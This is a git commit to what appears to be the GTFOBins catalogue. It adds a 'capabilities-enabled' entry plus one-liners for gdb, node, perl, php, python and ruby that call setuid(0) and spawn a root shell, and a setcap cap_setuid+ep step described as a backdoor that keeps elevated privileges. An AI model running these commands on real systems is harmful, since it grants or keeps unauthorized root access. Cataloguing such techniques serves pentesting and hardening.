Add the capabilities-enabled function

This exploits `setcap` to persist root privileges on Linux.
2024-12-26 06:49:44 +01:00 · 2018-09-13 14:49:51 +02:00 · 2018-09-13 14:49:51 +02:00 · 2e477b25de
commit 2e477b25de
parent 3125617475 aed737131c
9 changed files with 29 additions and 0 deletions
--- a/_data/functions.yml
+++ b/_data/functions.yml
@ -76,6 +76,13 @@ sudo-enabled:
    It runs in privileged context and may be used to access the file system,
    escalate or maintain access with elevated privileges if enabled on `sudo`.
 capabilities-enabled:
  label: Capabilities
  description: |
    It can manipulate its process UID and in Linux systems it can be set with the
    `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges.
    This also works if the binary is invoked by another binary with the capability set.
 suid-limited:
  label: Limited SUID
  description: |
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@ -12,4 +12,7 @@ functions:
        gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
  sudo-enabled:
    - code: sudo gdb -nx -ex '!sh' -ex quit
  capabilities-enabled:
    - description: Only if it has been compiled with Python support.
      code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
 ---
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@ -30,4 +30,7 @@ functions:
  sudo-enabled:
    - code: |
        sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
  capabilities-enabled:
    - code: |
        ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
 ---
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@ -12,4 +12,6 @@ functions:
    - code: ./perl -e 'exec "/bin/sh";'
  sudo-enabled:
    - code: sudo perl -e 'exec "/bin/sh";'
  capabilities-enabled:
    - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ---
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@ -46,4 +46,8 @@ functions:
    - code: |
        CMD="/bin/sh"
        sudo php -r "system('$CMD');"
  capabilities-enabled:
    - code: |
        CMD="/bin/sh"
        ./php -r "posix_setuid(0); system('$CMD');"
 ---
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@ -34,4 +34,6 @@ functions:
    - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
  sudo-enabled:
    - code: sudo python2 -c 'import os; os.system("/bin/sh")'
  capabilities-enabled:
    - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")'
 ---
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@ -34,4 +34,6 @@ functions:
    - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
  sudo-enabled:
    - code: sudo python3 -c 'import os; os.system("/bin/sh")'
  capabilities-enabled:
    - code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
 ---
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@ -29,4 +29,6 @@ functions:
    - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
  sudo-enabled:
    - code: sudo ruby -e 'exec "/bin/sh"'
  capabilities-enabled:
    - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
 ---
--- a/_layouts/bin.html
+++ b/_layouts/bin.html
@ -30,6 +30,10 @@ layout: common
 cp $(which {{ bin_name }}) .
 sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
 {% endif %}
 {%- if function_name == 'capabilities-enabled' %}
 cp $(which {{ bin_name }}) .
 sudo setcap cap_setuid+ep {{ bin_name }}
 {% endif %}
 {{ example.code }}
 {% endcapture %}